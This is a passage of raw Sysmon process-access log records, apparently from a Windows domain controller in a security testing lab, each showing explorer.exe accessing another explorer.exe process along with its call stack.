10341000x80000000000000001695200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001695185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:53:00.379{05ADC7E1-704C-603D-4488-00000000AD01}84761872C:\Windows\explorer.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001695184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 